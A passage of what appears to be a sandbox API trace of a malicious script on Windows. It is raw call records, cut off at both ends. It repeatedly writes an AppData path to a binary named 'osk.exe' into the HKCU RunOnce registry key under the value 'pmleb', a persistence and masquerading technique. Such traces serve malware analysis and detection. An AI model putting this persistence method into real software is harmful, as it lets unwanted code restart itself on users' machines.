[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.269] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0080.269] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.269] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0080.269] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.270] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0080.270] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.270] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.271] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.271] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.271] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.271] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.271] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.271] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.271] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.271] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.271] RegCloseKey (hKey=0x280) returned 0x0 [0080.272] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.272] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.272] SetTimer (hWnd=0x20280, nIDEvent=0x206f, uElapse=0xa, lpTimerFunc=0x0) returned 0x206f [0080.272] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.283] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.283] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.283] KillTimer (hWnd=0x20280, uIDEvent=0x206f) returned 1 [0080.283] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.284] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.284] IUnknown:Release (This=0x787518) returned 0x1 [0080.284] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.284] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.284] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.284] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.284] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.285] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0080.285] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.285] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0080.285] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.286] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0080.286] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.286] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.286] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.286] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.286] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.286] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.286] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.286] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.286] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.286] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.287] RegCloseKey (hKey=0x280) returned 0x0 [0080.287] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.287] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.287] SetTimer (hWnd=0x20280, nIDEvent=0x2070, uElapse=0xa, lpTimerFunc=0x0) returned 0x2070 [0080.287] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.299] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.299] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.299] KillTimer (hWnd=0x20280, uIDEvent=0x2070) returned 1 [0080.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.300] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.300] IUnknown:Release (This=0x787518) returned 0x1 [0080.300] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.300] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.300] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.300] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.300] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.301] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0080.301] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.301] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0080.301] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.302] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0080.302] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.302] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.302] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.302] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.302] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.302] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.303] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.303] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.303] RegCloseKey (hKey=0x280) returned 0x0 [0080.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.303] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.303] SetTimer (hWnd=0x20280, nIDEvent=0x2071, uElapse=0xa, lpTimerFunc=0x0) returned 0x2071 [0080.303] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.314] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.314] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.315] KillTimer (hWnd=0x20280, uIDEvent=0x2071) returned 1 [0080.315] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.315] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.315] IUnknown:Release (This=0x787518) returned 0x1 [0080.315] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.315] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.315] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.316] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: 